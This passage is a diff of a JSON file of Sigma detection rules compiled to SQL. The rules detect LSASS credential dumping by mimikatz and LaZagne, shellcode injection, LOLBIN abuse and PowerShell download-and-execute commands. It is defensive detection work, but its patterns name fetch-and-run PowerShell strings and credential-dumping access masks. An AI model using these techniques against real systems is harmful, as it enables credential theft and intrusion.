the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "status": "experimental", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Legitimate testing of Microsoft UI parts." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1047", + "attack.t1003.001", + "attack.t1059.001", "attack.lateral_movement", - "attack.t1021.003" + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "LittleCorporal Generated Maldoc Injection", + "id": 